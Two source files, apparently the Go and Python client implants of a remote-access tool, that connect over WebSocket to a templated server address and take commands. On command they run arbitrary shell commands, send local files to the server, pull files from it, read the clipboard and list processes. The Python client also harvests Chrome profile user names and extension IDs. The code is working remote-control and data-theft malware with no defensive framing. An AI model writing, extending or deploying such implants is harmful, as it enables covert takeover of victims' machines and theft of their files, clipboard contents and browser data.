File: client/go/ws_client/ws_client.go
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"io/ioutil"
	"log"
	"os"
	"os/exec"
	"strings"

	"net/url"

	"github.com/atotto/clipboard"
	"github.com/gorilla/websocket"
	"github.com/shirou/gopsutil/process"
)

type CommandResponse struct {
	Command string `json:"command"`
	Result  string `json:"result"`
	Action  string `json:"action"`
}

type CommandRequest struct {
	Command string `json:"command"`
}

func connectWebSocket(serverIP string, serverPort string) (*websocket.Conn, error) {
	u := url.URL{Scheme: "ws", Host: fmt.Sprintf("%s:%s", serverIP, serverPort), Path: "/ws"}
	log.Printf("Connecting to server at %s", u.String())
	conn, _, err := websocket.DefaultDialer.Dial(u.String(), nil)
	if err != nil {
		return nil, fmt.Errorf("connection failed: %w", err)
	}
	return conn, nil
}

func handleCommand(conn *websocket.Conn, command string) (string, error) {
	command = strings.TrimSpace(command) 
	var result string
	var err error
	switch command {
	case "list_files":
		return listFiles()
	case "get_clipboard":
		return getClipboardContent()
	case "list_processes":
		return listProcesses()
	case "":
		return "", nil
	default:
		if strings.HasPrefix(command, "download_file ") {
			filePath := strings.TrimSpace(strings.TrimPrefix(command, "download_file "))
			return downloadFileOverWebSocket(conn, filePath)
		} else if strings.HasPrefix(command, "upload_file ") {
			filePath := strings.TrimSpace(strings.TrimPrefix(command, "upload_file "))
			return uploadFileOverWebSocket(conn, filePath)
		} else if strings.HasPrefix(command, "execute_command ") {
			cmd := strings.TrimSpace(strings.TrimPrefix(command, "execute_command "))
			return executeCommand(cmd)
		} else {
			return "", fmt.Errorf("unknown command: %s", command)
		}
	}
	if err != nil {
		result = fmt.Sprintf("Error: %v", err)
	}
	response := CommandResponse{
		Result: result,
	}
	responseData, _ := json.Marshal(response)
	return string(responseData), nil
}

func listFiles() (string, error) {
	files, err := ioutil.ReadDir(".")
	if err != nil {
		return "", err
	}

	var fileList []string
	for _, file := range files {
		fileList = append(fileList, file.Name())
	}
	return strings.Join(fileList, "\n"), nil
}

func getClipboardContent() (string, error) {
	content, err := clipboard.ReadAll()
	if err != nil {
		return "", err
	}
	return content, nil
}

func executeCommand(command string) (string, error) {
	cmd := exec.Command("sh", "-c", command)
	output, err := cmd.CombinedOutput()
	return string(output), err
}

func listProcesses() (string, error) {
	procs, err := process.Processes()
	if err != nil {
		log.Fatalf("Error getting processes: %v", err)
		return "Error listing processes", nil
	}

	var processes []string
	for _, proc := range procs {
		name, err := proc.Name()
		if err != nil {
			continue 
		}
		processes = append(processes, fmt.Sprintf("PID: %d, Name: %s", proc.Pid, name))
	}

	if len(processes) == 0 {
		return "No processes found.", nil
	}
	return fmt.Sprintf("Processes:\n%s", strings.Join(processes, "\n")), nil
}

func receiveAndRespond(conn *websocket.Conn) {
	for {
		messageType, message, err := conn.ReadMessage()
		if err != nil {
			log.Printf("Error reading message: %v", err)
			return
		}

		if messageType == websocket.TextMessage {
			var commandRequest CommandRequest
			log.Printf("Received command from server: %s", message)
			if err := json.Unmarshal(message, &commandRequest); err != nil {
				log.Printf("Error parsing command JSON: %v message %s", err, message)
				continue
			}

			command := strings.TrimSpace(commandRequest.Command)

			result, err := handleCommand(conn, command)
			if err != nil {
				result = fmt.Sprintf("Error: %v", err)
			}
			response := CommandResponse{
				Command: command,
				Result:  result,
				Action:  "send_result",
			}
			responseData, _ := json.Marshal(response)
			log.Printf("JSON: %s", responseData)
			if err := conn.WriteMessage(websocket.TextMessage, responseData); err != nil {
				log.Printf("Error sending response: %v", err)
			}
		} else if messageType == websocket.BinaryMessage {
			log.Printf("Received binary message with size: %d bytes", len(message))
		}

	}
}

func uploadFileOverWebSocket(conn *websocket.Conn, filePath string) (string, error) {
	fileInfo, err := os.Stat(filePath)
	if err != nil {
		return "", fmt.Errorf("error getting file info: %w", err)
	}
	filename := fileInfo.Name()
	filesize := fileInfo.Size()
	uploadNotification := map[string]interface{}{
		"action":   "upload_file",
		"filename": filename,
		"filesize": filesize,
	}
	notificationMessage, _ := json.Marshal(uploadNotification)
	err = conn.WriteMessage(websocket.TextMessage, notificationMessage)
	if err != nil {
		return "", fmt.Errorf("error sending upload notification: %w", err)
	}
	log.Printf("Sent upload notification: filename=%s, filesize=%d", filename, filesize)
	file, err := os.Open(filePath)
	if err != nil {
		return "", fmt.Errorf("error opening file: %w", err)
	}
	defer file.Close()
	chunkSize := 1024 * 4
	buffer := make([]byte, chunkSize)
	for {
		n, err := file.Read(buffer)
		if err != nil {
			if err == io.EOF {
				break
			}
			return "", fmt.Errorf("error reading file: %w", err)
		}

		err = conn.WriteMessage(websocket.BinaryMessage, buffer[:n])
		if err != nil {
			return "", fmt.Errorf("error uploading file chunk: %w", err)
		}
		log.Printf("Uploaded chunk of %d bytes", n)
	}

	uploadCompleteMessage := map[string]string{
		"action": "upload_completed",
	}
	completeMessage, _ := json.Marshal(uploadCompleteMessage)
	err = conn.WriteMessage(websocket.TextMessage, completeMessage)
	if err != nil {
		return "", fmt.Errorf("error sending upload completion message: %w", err)
	}

	log.Println("Upload completed successfully.")
	return fmt.Sprintf("File %s uploaded successfully", filePath), nil
}

func downloadFileOverWebSocket(conn *websocket.Conn, filePath string) (string, error) {
	downloadRequest := map[string]string{
		"action":   "download_file",
		"filename": filePath,
	}
	requestMessage, _ := json.Marshal(downloadRequest)
	err := conn.WriteMessage(websocket.TextMessage, requestMessage)
	if err != nil {
		return "", fmt.Errorf("error sending download request: %w", err)
	}

	file, err := os.Create(filePath)
	if err != nil {
		return "", fmt.Errorf("error creating file: %w", err)
	}
	defer file.Close()

	for {
		messageType, fileData, err := conn.ReadMessage()
		if err != nil {
			return "", fmt.Errorf("error reading file data: %w", err)
		}
		if messageType == websocket.TextMessage {
			var response map[string]string
			if err := json.Unmarshal(fileData, &response); err == nil {
				if response["status"] == "completed" {
					log.Println("File download completed.")
					break
				}
			}
		}
		if messageType == websocket.BinaryMessage {
			_, err = file.Write(fileData)
			if err != nil {
				return "", fmt.Errorf("error writing to file: %w", err)
			}
			log.Printf("Received and saved %d bytes", len(fileData))
		}
	}

	return fmt.Sprintf("File %s downloaded successfully", filePath), nil
}

func main() {
	serverIP := "{ip}"
	serverPort := "{port}"
	//serverIP := "127.0.0.1"
	//serverPort := "8081"
	conn, err := connectWebSocket(serverIP, serverPort)
	if err != nil {
		log.Fatalf("Failed to connect to server: %v", err)
	}
	defer conn.Close()

	receiveAndRespond(conn)
}

File: client/python/ws_client/ws_client.py
import websocket
import json
import os
import subprocess
import pyperclip
import threading
import psutil


file_write_handle = None
download_in_progress = False
current_filename = None

def send_result(ws, result):
    response = {
        "action": "send_result",
        "status": "success",
        "result": result
    }
    ws.send(json.dumps(response))

def on_message(ws, message):
    global file_downloads

    try:
        if isinstance(message, bytes):
            if file_write_handle:
                file_write_handle.write(message)
                print(f"Received file chunk: {len(message)} bytes.")
            else:
                print("Error: Received file data without an active download.")
        else:
            if not message.strip():
                print("Received an empty message, ignoring.")
                return
            response = json.loads(message)
            if response.get("status") == "completed":
                print(f"Download completed for {current_filename}.")
                cleanup_download()
            elif response.get("status") == "error":
                print(f"Error during download: {response.get('message')}")
                cleanup_download()
            else:
                print(f"Received message: {message}")
                command = response.get("command")
                if command:
                    handle_command(ws, command)
    except json.JSONDecodeError as e:
        print(message)
        print(f"Error decoding message as JSON: {e}. Raw message: {message}")
    except Exception as e:
        print(f"Error processing message: {e}")
        cleanup_download()


def on_error(ws, error):
    print(f"Error: {error}")

def on_close(ws):
    print("Connection closed")
    cleanup_download()

def on_open(ws):
    print("Connected to WebSocket server")

def list_files(ws):
    try:
        files = os.listdir('.')
        result = "\n".join(files)
        send_result(ws, result)
    except Exception as e:
        send_result(ws, f"Error listing files: {str(e)}")

def get_clipboard(ws):
    try:
        clipboard_content = pyperclip.paste()
        send_result(ws, clipboard_content)
    except Exception as e:
        send_result(ws, f"Error getting clipboard content: {str(e)}")

def download_file(ws, filename):
    global file_write_handle, download_in_progress, current_filename

    if download_in_progress:
        print(f"Another download is already in progress for {current_filename}.")
        return

    try:
        save_path = filename
        file_write_handle = open(save_path, "wb")
        current_filename = filename
        download_in_progress = True

        request = {"action": "download_file", "filename": filename}
        ws.send(json.dumps(request))
        print(f"Download request sent for {filename}. Saving to {save_path}.")
    except Exception as e:
        print(f"Error initiating download: {e}")
        cleanup_download()

def cleanup_download():

    global file_write_handle, download_in_progress, current_filename

    if file_write_handle:
        file_write_handle.close()
        file_write_handle = None
    download_in_progress = False
    current_filename = None

def upload_file(ws, file_path):
    filename = os.path.basename(file_path)
    filesize = os.path.getsize(file_path)

    request = {
        "action": "upload_file",
        "filename": filename,
        "filesize": filesize,
    }
    ws.send(json.dumps(request))

    with open(file_path, "rb") as f:
        while chunk := f.read(1024 * 4):  
            ws.send(chunk, opcode=websocket.ABNF.OPCODE_BINARY)
    ws.send(json.dumps({"action": "upload_completed"}))
    print(f"Upload completed for file: {filename}")

def execute_command(ws, command):
    try:
        output = subprocess.check_output(command, shell=True, text=True)
        send_result(ws, output)
    except subprocess.CalledProcessError as e:
        send_result(ws, f"Error executing command: {str(e)}")

def list_processes(ws):
    try:
        processes = []
        for proc in psutil.process_iter(['pid', 'name', 'username']):
            processes.append(proc.info)
        send_result(ws, str(processes))
    except Exception as e:
        send_result(ws, f"Error listing processes: {str(e)}")
        
def get_chrome_profiles_and_extensions(ws):
    try:
        local_state_path = f'/Users/{os.getlogin()}/Library/Application Support/Google/Chrome/Local State'
        output = []
    
        with open(local_state_path, 'r', encoding='utf-8') as file:
            local_state = json.load(file)
    
        if 'profile' in local_state and 'last_active_profiles' in local_state['profile']:
            output.append("\nLast active profiles:")
            output.append(str(local_state['profile']['last_active_profiles']))
        else:
            output.append("\nCannot find last_active_profiles.")
    
        if 'profile' in local_state and 'last_used' in local_state['profile']:
            output.append("\nLast used profile:")
            output.append(str(local_state['profile']['last_used']))
        else:
            output.append("\nCannot find last_used.")
    
        if 'profile' in local_state and 'info_cache' in local_state['profile']:
            output.append("\nUser names in profile.info_cache:")
            for profile_name, profile_info in local_state['profile']['info_cache'].items():
                if 'user_name' in profile_info:
                    user_name = profile_info['user_name']
                    output.append(f" - Profile: {profile_name}, User Name: {user_name}")
                    
                    extension_dir = f'Library/Application Support/Google/Chrome/{profile_name}/Local Extension Settings'
                    
                    if os.path.exists(extension_dir):
                        extensions = os.listdir(extension_dir)
                        output.append(f"   Extensions for {profile_name}:")
                        for ext in extensions:
                            output.append(f"     - {ext}")
                    else:
                        output.append(f"   Directory does not exist: {extension_dir}")
                else:
                    output.append(f" - Profile: {profile_name}, cannot find user_name.")
            output.append("Search extension by https://chrome.google.com/webstore/detail/TEXT/{id}")
        else:
            output.append("\nCannot find profile.info_cache.")
        send_result(ws, str(output))
    except Exception as e:
        send_result(ws, f"Error get_chrome_profiles_and_extensions: {str(e)}")
        
def handle_command(ws, command):
    if command == "list_files":
        list_files(ws)
    elif command == "get_clipboard":
        get_clipboard(ws)
    elif command.startswith("download_file "):
        download_file(ws, command.split(" ", 1)[1])
    elif command.startswith("upload_file "):
        upload_file(ws, command.split(" ", 1)[1])
    elif command.startswith("execute_command "):
        execute_command(ws, command.split(" ", 1)[1])
    elif command == "list_processes":
        list_processes(ws)
    elif command == "get_chrome_info":
        get_chrome_profiles_and_extensions(ws)
    else:
        send_result(ws, "Unknown command")

if __name__ == "__main__":
    ip = "{ip}"
    port = "{port}"
    # ip = "127.0.0.1"
    # port = "8081"
    websocket_url = "ws://"+ip+":"+port+"/ws"
    ws = websocket.WebSocketApp(websocket_url,
                                on_message=on_message,
                                on_error=on_error,
                                on_close=on_close)
    
    ws.on_open = on_open
    ws_thread = threading.Thread(target=ws.run_forever)
    ws_thread.start()

    try:
        while True:
            pass
    except KeyboardInterrupt:
        ws.close()
        print("WebSocket client closed")

